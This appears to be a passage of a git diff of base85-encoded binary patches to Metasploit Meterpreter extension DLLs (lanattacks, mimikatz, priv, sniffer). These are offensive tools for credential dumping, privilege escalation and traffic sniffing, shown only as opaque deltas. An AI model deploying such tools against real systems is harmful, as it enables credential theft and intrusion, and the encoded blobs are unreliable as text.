b/data/meterpreter/ext_server_lanattacks.x64.dll index b9add05503afb0f4568c060f2004434cf3b05cf3..69577b3010f29eca617374e9685d7650c9e1d431 100755 GIT binary patch delta 45 xcmZqp!rSnLcftqeE&n<ue)eVJ=xlakY<FS=VW#a)jLeUuKvLV)WteZq0sy~(5$XT{ delta 45 xcmZqp!rSnLcfto|H_e2JpM9Bb-EDSaY<FS=VW#a)jLeUuKvLV)WteZq0sx}+5IO(= diff --git a/data/meterpreter/ext_server_lanattacks.x86.dll b/data/meterpreter/ext_server_lanattacks.x86.dll index d9d5ab6e14542c065edb989a74d3974211fd7411..0ea7c89b886e227badf78f4c4226eef0903aae03 100755 GIT binary patch delta 41 vcmZo@;cjT*p74V?^<T%t-@Z(|;mux*?Ou$G+r1c>c9nyKx3gC={qz6;SfvmW delta 41 vcmZo@;cjT*p74XYS0iEKZ(k<v)y-av?Ou$G+r1c>c9nyKx3gC={qz6;Kv@pB diff --git a/data/meterpreter/ext_server_mimikatz.x64.dll b/data/meterpreter/ext_server_mimikatz.x64.dll index 784fed7d8e36899d6351389129c6d2b1eb6800e4..85f80e20518a3425691fc4089a26126c937a5310 100755 GIT binary patch delta 92 zcmZqZP;BT>+`z%e{PbVPWNt=ZCb3`5QH<?Tj3CSe#LPg<0>rG_qZrxdsfZbvTbY_$ i85=M_fp21^g0W#cpBmeCJ~ei?c922a!`HH}oCW~C_ZkBL delta 92 zcmZqZP;BT>+`z%e+@_f@nVZp<=~HrZ6k~f7BM37AF*6Xe05R+KC`Pt<Dq@D_R>o#l iMg|N};8;+kU}V|Or^dFOPmSHJ9c0k<@U`qKrvU(2(HD>a diff --git a/data/meterpreter/ext_server_mimikatz.x86.dll b/data/meterpreter/ext_server_mimikatz.x86.dll index 2c38fad2b4de1139fed0a855fc0a0fb2b99fcc30..7448559c11f1dd3d4c07a4e2f9ab801a212643ed 100755 GIT binary patch delta 75 zcmZp8A<^(cVgVy_-@lH@%#6NF`=&PsF}4RWf-n;hGj9)KWU0C!WMFP(YG!3%!2krl YiIob*hTHF5Wcl_4q;dQ8ZLFHL0L2{|YXATM delta 75 zcmZp8A<^(cVgV!bX^n)*%#6NF7ymW~F}4RWf-n;hGj9)KWU0C!WN2<>Y;0v{$^Zn8 Y1w{%*mfP=LWcl_4q;dQ8ZLFHL0I5_NUjP6A diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll index 5535fe364495ac3a61b7d8fd7f9bb073ceb599af..9c91f1f7e492493415620db4772dd4ba8ab8c224 100755 GIT binary patch delta 37 rcmZozz|pXPW5N&SMgKY`{`O@OUES=(xZR79G3yveX#4i#jGi6<Kba7c delta 37 rcmZozz|pXPW5N$+Zq0;=zkQje{%`hT-0sE5m~{*!w0-+=Mo$j_7>^D< diff --git a/data/meterpreter/ext_server_priv.x86.dll b/data/meterpreter/ext_server_priv.x86.dll index c2f6a4896e52410be99d5a86e1df04371521b50b..266ece2e297a97ae9264f74da5316add25167ebc 100755 GIT binary patch delta 37 rcmZqp!`ASJZNdlUkbfN$Kl?I$7j1T8-0sB4c&QO2v|YTJ@ud|2Po5B` delta 37 rcmZqp!`ASJZNdlUV2y-{pM9AYXEr-AZg*m2ywnI1+AiMA_|gghEV~Y= diff --git a/data/meterpreter/ext_server_sniffer.x64.dll b/data/meterpreter/ext_server_sniffer.x64.dll index 75b7a50a328606007eaa9253c2920bc4e0f051ff..3a36b5bf813d8dab156ec129c92c5a9c21e3a4eb 100755 GIT binary patch delta 66019 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 